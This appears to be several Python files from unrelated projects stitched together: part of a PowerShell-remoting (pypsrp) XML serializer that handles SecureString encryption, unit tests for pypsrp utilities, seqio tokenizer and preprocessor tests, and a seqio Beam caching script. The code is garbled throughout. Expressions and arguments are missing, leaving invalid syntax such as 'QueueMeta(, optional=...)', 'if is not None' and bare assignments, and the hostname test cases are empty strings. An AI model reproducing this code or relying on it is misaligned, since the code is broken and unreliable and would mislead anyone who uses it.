ObjectMeta("Obj", object=WarningRecord), "System.Globalization.CultureInfo": ObjectMeta("Obj", object=CultureInfo), # Fallback to the GenericComplexObject "System.Object": ObjectMeta("ObjDynamic", object=GenericComplexObject), # Primitive types "System.String": ObjectMeta("S"), "System.Char": ObjectMeta("C"), "System.Boolean": ObjectMeta("B"), "System.DateTime": ObjectMeta("DT"), # None: ObjectMeta("TS"), # duration timespan "System.Byte": ObjectMeta("By"), "System.SByte": ObjectMeta("SB"), "System.UInt16": ObjectMeta("U16"), "System.Int16": ObjectMeta("I16"), "System.UInt32": ObjectMeta("U32"), "System.Int32": ObjectMeta("I32"), "System.UInt64": ObjectMeta("U64"), "System.Int64": ObjectMeta("I64"), "System.Single": ObjectMeta("Sg"), "System.Double": ObjectMeta("Db"), "System.Decimal": ObjectMeta("D"), # None: ObjectMeta("BA"), # Byte array base64 encoded "System.Guid": ObjectMeta("G"), "System.Uri": ObjectMeta("URI"), "System.Version": ObjectMeta("Version"), "System.Xml.XmlDocument": ObjectMeta("XD"), "System.Management.Automation.ScriptBlock": ObjectMeta("SBK"), "System.Security.SecureString": ObjectMeta("SS"), } # fallback to GenericComplexObject if no types were defined if metadata.tag == "Obj" and len(obj_types) == 0: obj_types = ["System.Object"] metadata = None for obj_type in obj_types: if obj_type.startswith("Deserialized.System."): obj_type = obj_type[13:] is_list = False if obj_type.endswith("[]"): obj_type = obj_type[0:-2] is_list = True elif obj_type.startswith("System.Collections.Generic.List`1[["): list_info = obj_type[35:-1] obj_type = list_info.split(",")[0] is_list = True elif obj_type.startswith("System.Collections.ObjectModel.Collection`1[["): list_info = obj_type[45:-1] obj_type = list_info.split(",")[0] is_list = True elif obj_type.startswith("System.Collections.ObjectModel.ReadOnlyCollection`1[["): list_info = obj_type[53:-1] obj_type = list_info.split(",")[0] is_list = True elif obj_type.startswith("System.Collections.Generic.Dictionary`2[["): dict_meta = obj_type[41:-2].split("],[") key_type = structures.get(dict_meta[0].split(",")[0], ObjectMeta()) value_type = structures.get(dict_meta[1].split(",")[0], ObjectMeta()) metadata = DictionaryMeta(dict_key_meta=key_type, dict_value_meta=value_type) break obj_meta = structures.get(obj_type) if obj_meta is not None: metadata = obj_meta if is_list: metadata = ListMeta(list_value_meta=metadata) break # we were unable to find the complex object type so just return the # element obj: typing.Any if metadata is None: obj = element_string elif metadata.tag == "Obj": obj = self._deserialize_obj(element, metadata) elif metadata.tag == "ObjDynamic": obj = self._deserialize_dynamic_obj(element, metadata) elif metadata.tag == "LST": obj = self._deserialize_lst(element, metadata) elif metadata.tag == "QUE": obj = self._deserialize_que(element) elif metadata.tag == "STK": obj = self._deserialize_stk(element) elif metadata.tag == "DCT": obj = self._deserialize_dct(element) else: log.warning("Unknown metadata tag type '%s', failed to deserialize object" % metadata.tag) obj = element_string if element.tag == "Obj": self.obj[element.attrib["RefId"]] = obj if isinstance(obj, ComplexObject): obj._xml = element_string return obj def _get_tag_from_value( self, value: typing.Any, ) -> str: # Get's the XML tag based on the value type, this is a simple list # and explicit tagging is recommended. value_type = type(value) if value_type == int: return "I32" elif value_type == bool: return "B" elif value_type == float: return "Sg" elif value_type == str: return "S" elif value_type == bytes: # This will only occur in Python 3 as a byte string in Python 2 is # a str. If users on that platform want a BA then they need to # explicitly set the metadata themselves return "BA" elif value_type == uuid.UUID: return "G" elif value_type == list: return "LST" elif value_type == dict: return "DCT" elif isinstance(value, Queue): return "QUE" elif isinstance(value, GenericComplexObject): return "ObjDynamic" elif isinstance(value, ComplexObject): return "Obj" else: # catch all, this probably isn't right but will not throw an # error return "S" def _serialize_obj( self, metadata: ObjectMeta, value: typing.Any, ) -> ET.Element: obj = ET.Element("Obj", RefId=self._get_obj_id()) if len(value._types) > 0: self._create_tn(obj, value._types) to_string_value = value._to_string if to_string_value is not None: ET.SubElement(obj, "ToString").text = self._serialize_string(to_string_value) for attr, property_meta in value._property_sets: attr_value = getattr(value, attr) self._create_obj(obj, attr_value, meta=property_meta) def serialize_prop(parent: str, properties: typing.Tuple[typing.Tuple[str, ObjectMeta], ...]) -> None: if len(properties) == 0: return parent_et = ET.SubElement(obj, parent) for attr, property_meta in properties: attr_value = getattr(value, attr) self._create_obj(parent_et, attr_value, meta=property_meta) serialize_prop("MS", value._extended_properties) serialize_prop("Props", value._adapted_properties) return obj def _serialize_dynamic_obj( self, metadata: ObjectMeta, value: typing.Any, ) -> ET.Element: obj = ET.Element("Obj", RefId=self._get_obj_id()) self.obj[obj.attrib["RefId"]] = value if len(value.types) > 0: self._create_tn(obj, value.types) if value.to_string is not None: ET.SubElement(obj, "ToString").text = self._serialize_string(value.to_string) for prop in value.property_sets: self._create_obj(obj, prop) def set_properties(element: str, prop_name: str) -> None: prop_keys = list(getattr(value, prop_name).keys()) if len(prop_keys) == 0: return parent = ET.SubElement(obj, element) prop_keys.sort() for key in prop_keys: prop = getattr(value, prop_name)[key] self._create_obj(parent, prop, key=key) set_properties("MS", "extended_properties") set_properties("Props", "adapted_properties") return obj def _serialize_que( self, metadata: QueueMeta, values: Queue, ) -> ET.Element: obj = ET.Element("Obj", RefId=self._get_obj_id()) if not isinstance(metadata, QueueMeta): metadata = QueueMeta(, optional=metadata.optional) self._create_tn(obj, metadata.list_types) que = ET.SubElement(obj, "QUE") while True: try: value = values.get(block=False) self.serialize(value, metadata.list_value_meta, parent=que, clear=False) except Empty: break return obj def _serialize_stk( self, metadata: StackMeta, values: typing.List, ) -> ET.Element: obj = ET.Element("Obj", RefId=self._get_obj_id()) self._create_tn(obj, metadata.list_types) stk = ET.SubElement(obj, "STK") while True: try: value = values.pop() self.serialize(value, metadata.list_value_meta, parent=stk, clear=False) except IndexError: break return obj def _serialize_ie( self, metadata: ListMeta, values: typing.List, ) -> ET.Element: return self._serialize_lst(metadata, values, tag="IE") def _serialize_lst( self, metadata: ListMeta, values: typing.List, tag: str = "LST", ) -> ET.Element: obj = ET.Element("Obj", RefId=self._get_obj_id()) if not isinstance(metadata, ListMeta): metadata = ListMeta(, optional=metadata.optional) self._create_tn(obj, metadata.list_types) lst = ET.SubElement(obj, tag) for value in iter(values): entry_meta = copy(metadata.list_value_meta) self.serialize(value, entry_meta, parent=lst, clear=False) return obj def _serialize_dct( self, metadata: DictionaryMeta, values: typing.Dict, ) -> ET.Element: obj = ET.Element("Obj", RefId=self._get_obj_id()) if not isinstance(metadata, DictionaryMeta): metadata = DictionaryMeta(, optional=metadata.optional) self._create_tn(obj, metadata.dict_types) dct = ET.SubElement(obj, "DCT") # allow dicts to be defined as a tuple so that the order is kept iterator: typing.Iterable[typing.Tuple[typing.Any, typing.Any]] if isinstance(values, tuple): iterator = values else: iterator = values.items() for key, value in iterator: en = ET.SubElement(dct, "En") key_meta = copy(metadata.dict_key_meta) value_meta = copy(metadata.dict_value_meta) self.serialize(key, key_meta, parent=en, clear=False) self.serialize(value, value_meta, parent=en, clear=False) return obj def _serialize_string( self, value: typing.Optional[str], ) -> typing.Optional[str]: if value is None: return None def rplcr(matchobj): surrogate_char = byte_char = to_bytes(surrogate_char, encoding="utf-16-be") hex_char = to_unicode(binascii.hexlify(byte_char)).upper() hex_split = [hex_char[i : i + 4] for i in range(0, len(hex_char), 4)] return "".join(["_x%s_" % i for i in hex_split]) # before running the translation we need to make sure _ before x is # encoded, normally _ isn't encoded except when preceding x string_value = to_unicode(value) # The MS-PSRP docs don't state this but the _x0000_ matcher is case insensitive so we need to make sure we # escape _X as well as _x. string_value = re.sub("(?i)_(x)", "_x005F_\\1", string_value) string_value = re.sub(self._serial_str, rplcr, string_value) return string_value def _serialize_secure_string( self, value: str, ) -> str: if self.cipher is None: raise SerializationError("Cannot generate secure string as cipher is not initialised") # convert the string to a UTF-16 byte string as that is what is # expected in Windows. If a byte string (native string in Python 2) was # passed in, the sender must make sure it is a valid UTF-16 # representation and not UTF-8 or else the server will fail to decrypt # the secure string in most cases string_bytes = to_bytes(value, encoding="utf-16-le") padder = PKCS7(self.cipher.algorithm.block_size).padder() padded_data = padder.update(string_bytes) + padder.finalize() encryptor = self.cipher.encryptor() ss_value = encryptor.update(padded_data) + encryptor.finalize() ss_string = to_string(base64.b64encode(ss_value)) return ss_string def _deserialize_obj( self, element: ET.Element, metadata: ObjectMeta, ) -> typing.Any: obj = metadata.object() # type: ignore[misc] # Caller always sets object self.obj[element.attrib["RefId"]] = obj to_string_value = element.find("ToString") if to_string_value is not None: obj._to_string = self._deserialize_string(to_string_value.text) def deserialize_property(prop_tag: str, properties: typing.Tuple[typing.Tuple[str, ObjectMeta], ...]) -> None: for attr, property_meta in properties: if attr == "invocation_info": a = "" property_name = "Unknown" property_filter = "" if is not None: property_name = property_filter = "[@N='%s']" % tags = [property_meta.tag] # The below tags are actually seen as Obj in the parent element if property_meta.tag in ["DCT", "LST", "IE", "QUE", "STK", "ObjDynamic"]: tags = ["Obj", "Ref"] val = None for tag in tags: val = element.find("%s%s%s" % (prop_tag, tag, property_filter)) if val is not None: break if val is None and not property_meta.optional: val = element.find("%sNil%s" % (prop_tag, property_filter)) if val is None: obj_name = str(obj) if obj._to_string is not None else "Unknown" err_msg = "Mandatory return value for '%s' was not found on object %s" % ( property_name, obj_name, ) raise SerializationError(err_msg) val = None elif val is not None: val = self.deserialize(val, property_meta, clear=False) setattr(obj, attr, val) deserialize_property("", obj._property_sets) deserialize_property("Props/", obj._adapted_properties) deserialize_property("MS/", obj._extended_properties) return obj def _deserialize_dynamic_obj( self, element: ET.Element, metadata: ObjectMeta, ) -> typing.Any: obj = metadata.object() # type: ignore[misc] # Caller always sets object self.obj[element.attrib["RefId"]] = obj for obj_property in element: if obj_property.tag == "TN": for obj_type in obj_property: obj.types.append(obj_type.text)[obj_property.attrib["RefId"]] = obj.types elif obj_property.tag == "TNRef": obj.types =[obj_property.attrib["RefId"]] elif obj_property.tag == "Props": for adapted_property in obj_property: key = adapted_property.attrib["N"] value = self.deserialize(adapted_property, clear=False) obj.adapted_properties[key] = value elif obj_property.tag == "MS": for extended_property in obj_property: key = extended_property.attrib["N"] value = self.deserialize(extended_property, clear=False) obj.extended_properties[key] = value elif obj_property.tag == "ToString": value = self.deserialize(obj_property, clear=False) obj.to_string = value else: value = self.deserialize(obj_property, clear=False) obj.property_sets.append(value) return obj def _deserialize_lst( self, element: ET.Element, metadata: typing.Optional[ObjectMeta] = None, ) -> typing.List: list_value = [] value_meta = getattr(metadata, "list_value_meta", None) entries = element.find("LST") for entry in entries or []: entry_value = self.deserialize(entry, value_meta, clear=False) list_value.append(entry_value) return list_value def _deserialize_que( self, element: ET.Element, ) -> Queue: queue: Queue = Queue() entries = element.find("QUE") for entry in entries or []: entry_value = self.deserialize(entry, clear=False) queue.put(entry_value) return queue def _deserialize_stk( self, element: ET.Element, ) -> typing.List: # no native Stack object in Python so just use a list stack = [] entries = element.find("STK") for entry in entries or []: entry_value = self.deserialize(entry, clear=False) stack.append(entry_value) return stack def _deserialize_dct( self, element: ET.Element, ) -> typing.Dict: dictionary = {} entries = element.findall("DCT/En") for entry in entries: key = entry.find("*[@N='Key']") value = entry.find("*[@N='Value']") key = self.deserialize(key if key is not None else "", clear=False) value = self.deserialize(value if value is not None else "", clear=False) dictionary[key] = value return dictionary def _deserialize_string( self, value: typing.Optional[str], ) -> str: if value is None: return "" def rplcr(matchobj): # The matched object is the UTF-16 byte representation of the UTF-8 # hex string value. We need to decode the byte str to unicode and # then unhexlify that hex string to get the actual bytes of the # _x****_ value, e.g. # group(0) == b"\x00_\x00x\x000\x000\x000\x00A\x00_" # group(1) == b"\x000\x000\x000\x00A" # unicode (from utf-16-be) == u"000A" # returns b"\x00\x0A" match_hex = hex_string = to_unicode(match_hex, encoding="utf-16-be") return binascii.unhexlify(hex_string) # need to ensure we start with a unicode representation of the string # so that we can get the actual UTF-16 bytes value from that string unicode_value = to_unicode(value) unicode_bytes = to_bytes(unicode_value, encoding="utf-16-be") bytes_value = re.sub(self._deserial_str, rplcr, unicode_bytes) return to_unicode(bytes_value, encoding="utf-16-be") def _deserialize_secure_string(self, value: ET.Element) -> typing.Union[ET.Element, str]: if self.cipher is None: # cipher is not set up so we can't decrypt the string, just return # the raw element return value ss_string = base64.b64decode(value.text or "") decryptor = self.cipher.decryptor() decrypted_bytes = decryptor.update(ss_string) + decryptor.finalize() unpadder = PKCS7(self.cipher.algorithm.block_size).unpadder() unpadded_bytes = unpadder.update(decrypted_bytes) + unpadder.finalize() decrypted_string = to_unicode(unpadded_bytes, "utf-16-le") return decrypted_string def _clear(self) -> None: self.obj_id = 0 self.obj = {} = {} self.tn_id = 0 def _get_obj_id(self) -> str: ref_id = str(self.obj_id) self.obj_id += 1 return ref_id def _get_types_from_obj( self, element: ET.Element, ) -> typing.List[str]: obj_types = [e.text or "" for e in element.findall("TN/T")] if len(obj_types) > 0: ref_id = element.find("TN").attrib["RefId"] # type: ignore[union-attr] # Mandated by the spec[ref_id] = obj_types tn_ref = element.find("TNRef") if tn_ref is not None: ref_id = tn_ref.attrib["RefId"] obj_types =[ref_id] return obj_types def _create_tn( self, parent: ET.Element, types: typing.List[str], ) -> None: main_type = types[0] ref_id =, None) if ref_id is None: ref_id = self.tn_id self.tn_id += 1[main_type] = ref_id tn = ET.SubElement(parent, "TN", RefId=str(ref_id)) for type_name in types: ET.SubElement(tn, "T").text = type_name else: ET.SubElement(parent, "TNRef", RefId=str(ref_id)) def _create_obj( self, parent: ET.Element, obj: typing.Any, key: typing.Optional[str] = None, meta: typing.Optional[ObjectMeta] = None, ) -> None: if isinstance(obj, ComplexObject): for ref, value in self.obj.items(): if value == obj: sub_element = ET.SubElement(parent, "Ref", RefId=ref) if key is not None: sub_element.attrib["N"] = key return if meta is None: meta = ObjectMeta(name=key) self.serialize(obj, metadata=meta, parent=parent, clear=False) class TaggedValue(object): def __init__( self, tag: str, value: typing.Any, ) -> None: self.tag = tag self.value = value ``` #### File: pypsrp/tests/ ```python import pytest from pypsrp._utils import ( get_hostname, to_bytes, to_string, to_unicode, version_equal_or_newer, ) def test_unicode_to_bytes_default(): expected = b"\x61\x62\x63" actual = to_bytes("abc") assert actual == expected def test_unicode_to_bytes_diff_encoding(): expected = b"\x61\x00\x62\x00\x63\x00" actual = to_bytes("abc", encoding="utf-16-le") assert actual == expected def test_bytes_to_bytes(): expected = b"\x01\x02\x03\x04" actual = to_bytes(b"\x01\x02\x03\x04") assert actual == expected def test_str_to_bytes(): # Python 3 the default string type is unicode so the expected value will # be "abc" in UTF-16 form while Python 2 "abc" is the bytes representation # already expected = b"\x61\x00\x62\x00\x63\x00" actual = to_bytes("abc", encoding="utf-16-le") assert actual == expected def test_unicode_to_unicode(): expected = "abc" actual = to_unicode("abc") assert actual == expected def test_byte_to_unicode(): expected = "abc" actual = to_unicode(b"\x61\x62\x63") assert actual == expected def test_byte_to_unicode_diff_encoding(): expected = "abc" actual = to_unicode(b"\x61\x00\x62\x00\x63\x00", encoding="utf-16-le") assert actual == expected def test_str_to_unicode(): expected = "a\x00b\x00c\x00" actual = to_unicode("a\x00b\x00c\x00", encoding="utf-16-le") assert actual == expected def test_to_str(): assert str(to_string).startswith("<function to_unicode") @pytest.mark.parametrize( "version, reference_version, expected", [ ["2.2", "2.3", False], ["2.3", "2.3", True], ["2.4", "2.3", True], ["3", "2.3", True], ["3.0", "2.3", True], ["1", "2.3", False], ["1.0", "2.3", False], ["2.3.0", "2.3", True], ["2.3.1", "2.3", True], ["2.3", "2.3.0", True], ["2.3", "2.3.1", False], ], ) def test_version_newer(version, reference_version, expected): assert version_equal_or_newer(version, reference_version) == expected @pytest.mark.parametrize( "url, expected", [ # hostname ["http://hostname", "hostname"], ["https://hostname", "hostname"], ["http://hostname:1234", "hostname"], ["https://hostname:1234", "hostname"], ["http://hostname/path", "hostname"], ["https://hostname/path", "hostname"], ["http://hostname:1234/path", "hostname"], ["https://hostname:1234/path", "hostname"], # fqdn ["", ""], ["", ""], ["", ""], ["", ""], ["", ""], ["", ""], ["", ""], ["", ""], # ip address ["", ""], ["", ""], ["", ""], ["", ""], ["", ""], ["", ""], ["", ""], ["", ""], ], ) def test_get_hostname(url, expected): assert expected == get_hostname(url) ```
{ "source": "00mjk/seqio", "score": 2 }
#### File: seqio/seqio/ ```python from absl.testing import absltest from seqio import dataset_providers from seqio import preprocessors from seqio import test_utils import tensorflow.compat.v2 as tf assert_dataset = test_utils.assert_dataset Feature = dataset_providers.Feature class PreprocessorsTest(tf.test.TestCase): def test_tokenize(self): og_dataset ={ 'prefix': 'This is', 'suffix': 'a test.' }) output_features = { 'prefix': Feature( test_utils.MockVocabulary({'This is': [0, 1]}), add_eos=True), 'suffix': Feature( test_utils.MockVocabulary({'a test.': [2, 3]}), add_eos=False), } assert_dataset( preprocessors.tokenize(og_dataset, output_features=output_features), { 'prefix': [0, 1], 'prefix_pretokenized': 'This is', 'suffix': [2, 3], 'suffix_pretokenized': 'a test.' }) assert_dataset( preprocessors.tokenize( og_dataset, output_features=output_features, copy_pretokenized=False), { 'prefix': [0, 1], 'suffix': [2, 3] }) assert_dataset( preprocessors.tokenize_and_append_eos( og_dataset, output_features=output_features, copy_pretokenized=False), { 'prefix': [0, 1, 1], 'suffix': [2, 3] }) def test_tokenize_multiple_ranks(self): vocab = test_utils.sentencepiece_vocab() output_features = { 'prefix': Feature(vocab, add_eos=True), 'suffix': Feature(vocab, add_eos=False), } # Test for 1-rank features. og_dataset_1d ={ 'prefix': ['This is', 'this is'], 'suffix': ['a test.', 'another'] }) assert_dataset( preprocessors.tokenize(og_dataset_1d, output_features=output_features), { 'prefix': [[3, 2, 20, 8, 6, 3, 8, 6], [11, 8, 6, 3, 8, 6]], 'prefix_pretokenized': ['This is', 'this is'], 'suffix': [[3, 5, 10, 2], [3, 5, 22, 7, 24, 20, 4, 23]], 'suffix_pretokenized': ['a test.', 'another'] }) assert_dataset( preprocessors.tokenize( og_dataset_1d, output_features=output_features, with_eos=True), { 'prefix': [[3, 2, 20, 8, 6, 3, 8, 6], [11, 8, 6, 3, 8, 6, 1]], 'prefix_pretokenized': ['This is', 'this is'], 'suffix': [[3, 5, 10, 2], [3, 5, 22, 7, 24, 20, 4, 23]], 'suffix_pretokenized': ['a test.', 'another'] }) # Test for 2-rank features. og_dataset_2d ={ 'prefix': [['This is'], ['this is']], 'suffix': [['a test.'], ['another']] }) assert_dataset( preprocessors.tokenize(og_dataset_2d, output_features=output_features), { 'prefix': [[[3, 2, 20, 8, 6, 3, 8, 6]], [[11, 8, 6, 3, 8, 6]]], 'prefix_pretokenized': [['This is'], ['this is']], 'suffix': [[[3, 5, 10, 2]], [[3, 5, 22, 7, 24, 20, 4, 23]]], 'suffix_pretokenized': [['a test.'], ['another']] }) assert_dataset( preprocessors.tokenize( og_dataset_2d, output_features=output_features, with_eos=True), { 'prefix': [[[3, 2, 20, 8, 6, 3, 8, 6, 1]], [[11, 8, 6, 3, 8, 6, 1]]], 'prefix_pretokenized': [['This is'], ['this is']], 'suffix': [[[3, 5, 10, 2]], [[3, 5, 22, 7, 24, 20, 4, 23]]], 'suffix_pretokenized': [['a test.'], ['another']] }) # Test for 3-rank features. og_dataset_3d ={ 'prefix': tf.ragged.constant([[['a', 'b'], ['c']], [['d', 'e'], ['f']], [['g', 'h'], ['i']]]), 'suffix': tf.ragged.constant([[['j'], ['k', 'l', 'm']], [['n'], ['o', 'p']]]), }) assert_dataset( preprocessors.tokenize(og_dataset_3d, output_features=output_features), { 'prefix': [[[[3, 5], [3, 2]], [[3, 13]]], [[[3, 21], [3, 4]], [[3, 2]]], [[[3, 2], [3, 20]], [[3, 8]]]], 'prefix_pretokenized': [[['a', 'b'], ['c']], [['d', 'e'], ['f']], [['g', 'h'], ['i']]], 'suffix': [[[[3, 2]], [[3, 2], [3, 9], [3, 14]]], [[[3, 22]], [[3, 7], [3, 15]]]], 'suffix_pretokenized': [[['j'], ['k', 'l', 'm']], [['n'], ['o', 'p']]], }) assert_dataset( preprocessors.tokenize( og_dataset_3d, output_features=output_features, with_eos=True), { 'prefix': [[[[3, 5], [3, 2, 1]], [[3, 13, 1]]], [[[3, 21], [3, 4, 1]], [[3, 2, 1]]], [[[3, 2], [3, 20, 1]], [[3, 8, 1]]]], 'prefix_pretokenized': [[['a', 'b'], ['c']], [['d', 'e'], ['f']], [['g', 'h'], ['i']]], 'suffix': [[[[3, 2]], [[3, 2], [3, 9], [3, 14]]], [[[3, 22]], [[3, 7], [3, 15]]]], 'suffix_pretokenized': [[['j'], ['k', 'l', 'm']], [['n'], ['o', 'p']]], }) def test_append_eos(self): # Features for this test: # name | shape | add_eos | seq_length # ---------+-----------+---------+----------- # inputs | [3] | False | 4 # targets | [4] | True | 3 # arrows | [4] | True | 5 # strings | [3, 2] | True | 3 # feathers | [3, None] | True | 4 # bows | [2] | n/a | 1 og_dataset ={ 'inputs': [1, 2, 3], 'targets': [4, 5, 6, 7], 'arrows': [8, 9, 10, 11], 'strings': [[14, 15], [16, 17], [18, 19]], 'feathers': tf.ragged.constant([[20, 21], [], [22, 23, 24, 25, 26]]), 'bows': [12, 13], }) vocab = test_utils.sentencepiece_vocab() output_features = { 'inputs': Feature(vocab, add_eos=False), 'targets': Feature(vocab, add_eos=True), 'arrows': Feature(vocab, add_eos=True), 'strings': Feature(vocab, add_eos=True), 'feathers': Feature(vocab, add_eos=True), } sequence_length = { 'inputs': 4, 'targets': 3, 'arrows': 5, 'strings': 3, 'feathers': 4, 'bows': 1 # note: ignored, since bows is not in output_features. } # Add eos only. assert_dataset( preprocessors.append_eos(og_dataset, output_features), { 'inputs': [1, 2, 3], 'targets': [4, 5, 6, 7, 1], 'arrows': [8, 9, 10, 11, 1], 'strings': [[14, 15, 1], [16, 17, 1], [18, 19, 1]], 'feathers': [[20, 21, 1], [1], [22, 23, 24, 25, 26, 1]], 'bows': [12, 13], }) # Trim to sequence lengths. assert_dataset( preprocessors.append_eos_after_trim( og_dataset, output_features=output_features, sequence_length=sequence_length), { 'inputs': [1, 2, 3], 'targets': [4, 5, 1], 'arrows': [8, 9, 10, 11, 1], 'strings': [[14, 15, 1], [16, 17, 1], [18, 19, 1]], 'feathers': [[20, 21, 1], [1], [22, 23, 24, 1]], 'bows': [12, 13], }) # Trim to sequence lengths (but with targets=None). sequence_length['targets'] = None assert_dataset( preprocessors.append_eos_after_trim( og_dataset, output_features=output_features, sequence_length=sequence_length), { 'inputs': [1, 2, 3], 'targets': [4, 5, 6, 7, 1], 'arrows': [8, 9, 10, 11, 1], 'strings': [[14, 15, 1], [16, 17, 1], [18, 19, 1]], 'feathers': [[20, 21, 1], [1], [22, 23, 24, 1]], 'bows': [12, 13], }) # Don't trim to sequence lengths. assert_dataset( preprocessors.append_eos_after_trim( og_dataset, output_features=output_features), { 'inputs': [1, 2, 3], 'targets': [4, 5, 6, 7, 1], 'arrows': [8, 9, 10, 11, 1], 'strings': [[14, 15, 1], [16, 17, 1], [18, 19, 1]], 'feathers': [[20, 21, 1], [1], [22, 23, 24, 25, 26, 1]], 'bows': [12, 13], }) def test_append_to_innermost_axis(self): test_cases = [ ([1, 2, 3], -1, [1, 2, 3, -1]), ([[1, 2], [3, 4]], -1, [[1, 2, -1], [3, 4, -1]]), (tf.ragged.constant([[1, 2], [3]]), -1, [[1, 2, -1], [3, -1]]), (tf.ragged.constant([[[1, 2], [3]], [[4, 5, 6]]]), -1, [[[1, 2, -1], [3, -1]], [[4, 5, 6, -1]]]), (tf.ragged.constant([[[1, 2], [3, 4]], [[5, 6]]], ragged_rank=1), -1, [[[1, 2, -1], [3, 4, -1]], [[5, 6, -1]]]), ] for (tensor, scalar, expected) in test_cases: with self.subTest(f'({tensor}, {scalar}) -> {expected}'): actual = preprocessors._append_to_innermost_axis(tensor, scalar) self.assertAllEqual(actual, expected) def test_rekey(self): og_dataset ={ 'text': 'That is good.', 'other': 'That is bad.'}) dataset = preprocessors.rekey( og_dataset, {'inputs': 'other', 'targets': 'text'}) assert_dataset( dataset, {'inputs': 'That is bad.', 'targets': 'That is good.'}) dataset = preprocessors.rekey(og_dataset, {'targets': 'text'}) assert_dataset(dataset, {'targets': 'That is good.'}) dataset = preprocessors.rekey(og_dataset, {'inputs': 'text'}) assert_dataset(dataset, {'inputs': 'That is good.'}) dataset = preprocessors.rekey(og_dataset) assert_dataset(dataset, {'text': 'That is good.', 'other': 'That is bad.'}) dataset = preprocessors.rekey( og_dataset, {'inputs': 'text', 'targets': None}) assert_dataset(dataset, {'inputs': 'That is good.', 'targets': ''}) if __name__ == '__main__': absltest.main() ``` #### File: seqio/scripts/ ```python r"""Dumps preprocessed tasks as TFRecord of tf.Examples. Usage: ==================== seqio_cache_tasks \ --tasks=my_task_*,your_task \ --excluded_tasks=my_task_5 \ --output_cache_dir=/path/to/cache_dir \ --module_import=my.tasks \ --alsologtostderr """ import importlib import os import re from absl import app from absl import flags from absl import logging import apache_beam as beam import seqio from seqio import beam_utils import tensorflow.compat.v2 as tf # Significantly speeds up preprocessing in tf1. tf.compat.v1.enable_eager_execution() FLAGS = flags.FLAGS flags.DEFINE_list( "tasks", None, "Regexes matching task(s) to build a preprocessed dataset for. Will build " "all registered if not specified.") flags.DEFINE_list( "excluded_tasks", None, "Regexes matching task(s) to skip.") flags.DEFINE_string( "output_cache_dir", None, "The directory to output cached tasks to.") flags.DEFINE_list( "tasks_additional_cache_dirs", [], "Additional directories to search for cached Tasks after checking the " "global caches and `output_cache_dir`.") flags.DEFINE_multi_string( "module_import", [], "Modules to import. Use this, for example, to add new `Task`s to the " "global `TaskRegistry`.") flags.DEFINE_list( "pipeline_options", ["--runner=DirectRunner"], "A comma-separated list of command line arguments to be used as options " "for the Beam Pipeline.") flags.DEFINE_boolean( "overwrite", False, "If true, overwrite the cached task even if it exists in the cached " "directories.") flags.DEFINE_integer( "min_shards", 64, "The minimum number of output shards to produce. Higher is better for " "improved online data shuffling during training.") def _import_modules(modules): for module in modules: if module: importlib.import_module(module) def run_pipeline(pipeline, task_names, cache_dir, excluded_tasks=None, modules_to_import=(), overwrite=False, completed_file_contents=""): """Run preprocess pipeline.""" output_dirs = [] # Includes all names by default. included_regex = re.compile(r"(%s\Z)" % r"\Z|".join(task_names or [".*"])) # Excludes only empty names by default. excluded_regex = re.compile(r"(%s\Z)" % r"\Z|".join(excluded_tasks or [])) task_names = [ t for t in seqio.TaskRegistry.names() if included_regex.match(t) and not excluded_regex.match(t)] if not task_names: logging.warning("No tasks have been selected from the task registry. " "Please make sure that the tasks you want cached exist in " "the task registry and haven't been excluded by the " "--excluded_tasks flag.") for task_name in task_names: task = seqio.TaskRegistry.get(task_name) if not task.supports_caching: "Skipping task that does not support caching: '%s'", continue task_cache_dir = task.cache_dir output_dir = os.path.join( cache_dir, seqio.get_task_dir_from_name( if task_cache_dir and not overwrite:"Skipping task '%s', which exists in cache dir: %s",, task_cache_dir) continue if task_cache_dir and overwrite: if task_cache_dir == output_dir: # We were asked to overwrite the data, and the given directory that we # should generate the data in already has the data, then delete it. logging.warning( "Overwriting already cached data for task '%s' in cache_dir %s",, output_dir) else: # Cannot overwrite, since cache_dir isn't same as task.cache_dir. logging.warning("Not overwriting data in task.cache_dir since it is " "different from cache_dir - %s vs %s", task.cache_dir, output_dir) continue if not task.splits: logging.warning("Skipping task '%s' with no splits.", continue # Log this task to the terminal. print("Caching task '%s' with splits: %s" % (, task.splits)) output_dirs.append(output_dir) completion_values = [] if isinstance(task.source, seqio.FunctionDataSource): logging.warning( "Task '%s' using FunctionDataSource cannot be distributed. If your " "dataset is large, you may be able to speed up preprocessing by " "sharding it and using a TfdsSource, TFExampleSource, or " "TextLineSource instead.", for split in task.splits: label = "%s_%s" % (, split) pat = beam_utils.PreprocessTask( task, split, modules_to_import=modules_to_import) num_shards = min(len(pat.shards), FLAGS.min_shards) examples = pipeline | "%s_pat" % label >> pat completion_values.append( examples | "%s_write_tfrecord" % label >> beam_utils.WriteExampleTfRecord( seqio.get_cached_tfrecord_prefix(output_dir, split), num_shards=num_shards)) completion_values.append( examples | "%s_info" % label >> beam_utils.GetInfo(num_shards) | "%s_write_info" % label >> beam_utils.WriteJson( seqio.get_cached_info_path(output_dir, split))) completion_values.append( examples | "%s_stats" % label >> beam_utils.GetStats(task.output_features) | "%s_write_stats" % label >> beam_utils.WriteJson( seqio.get_cached_stats_path(output_dir, split))) # After all splits for this task have completed, write COMPLETED files to # the task's output directory. _ = (completion_values | "%s_flatten_completion_values" % >> beam.Flatten() | "%s_discard_completion_values" % >> beam.Filter( lambda _: False) | "%s_write_completed_file" % >> os.path.join(output_dir, "COMPLETED"), append_trailing_newlines=False, num_shards=1, shard_name_template="", header=completed_file_contents)) return output_dirs def main(_): flags.mark_flags_as_required(["output_cache_dir"]) _import_modules(FLAGS.module_import) seqio.add_global_cache_dirs( [FLAGS.output_cache_dir] + FLAGS.tasks_additional_cache_dirs) pipeline_options = beam.options.pipeline_options.PipelineOptions( FLAGS.pipeline_options) with beam.Pipeline(options=pipeline_options) as pipeline: unused_output_dirs = run_pipeline( pipeline, FLAGS.tasks, FLAGS.output_cache_dir, FLAGS.excluded_tasks, FLAGS.module_import, FLAGS.overwrite, ) def console_entry_point(): if __name__ == "__main__": console_entry_point() ```
{ "source": "00mjk/Surelog", "score": 2 }
